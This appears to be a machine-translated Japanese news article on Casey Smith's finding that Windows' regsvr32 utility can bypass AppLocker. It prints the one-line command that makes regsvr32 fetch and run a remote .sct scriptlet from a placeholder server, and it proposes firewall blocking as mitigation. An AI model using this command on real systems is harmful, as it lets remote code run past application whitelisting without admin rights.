コロラド州のケーシースミスという名前の研究者は、Regsvr32を使用してWindows 10でAppLockerをバイパスできることを発見しました。これはコンピューターユーザー、特にビジネス環境のユーザーにとって大きな問題です。

AppLockerは、Windows 7およびWindows Server 2008 R2で初めて導入されました。 管理者は、ファイルの一意のIDに基づいて、一部またはすべてのアプリケーションを利用できるグループまたはユーザーを指定できるように設計されています。 AppLockerを使用する傾向がある場合は、特定のルールを作成して、アプリケーションがトラック内でそれらを実行または停止できるようにするために使用できることはよく知られているはずです。

知らない人のために、Regvr32を使用してDLLを登録および登録解除できます。 これはコマンドラインユーティリティであるため、ワンクリックツールではありません。そのため、上級のコンピューターユーザーのみが提供する機能を活用してください。

この手法を使用しても、コンピューターシステムのレジストリが変更されることはないため、変更が行われたかどうかを管理者が知ることは困難です。

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

「ここで驚くべきことは、regsvr32がすでにプロキシ対応であり、TLSを使用し、リダイレクトに従うなどであるということです。そして…署名されたデフォルトのMSバイナリを推測しました。 したがって、あなたがする必要があるのは、あなたが制御する場所でyour.sctファイルをホストすることだけです」とスミスは書きました。

上記の手法は管理者権限を必要とせず、レジストリを変更しません。 さらに、スクリプトはHTTPまたはHTTPSの両方で呼び出すことができます。 現時点では、Microsoftはこの小さな問題に対するパッチをリリースしていないため、この時点での唯一のオプションは、Windowsファイアウォールを介してRegsvr32をブロックすることです。

興味深いことに、ソフトウェアの巨人は、オペレーティングシステムが直面しているこのセキュリティの問題についてまだ対応していません。 公開されたので、将来のパッチの話とともに会社から何かを聞くことを期待しています。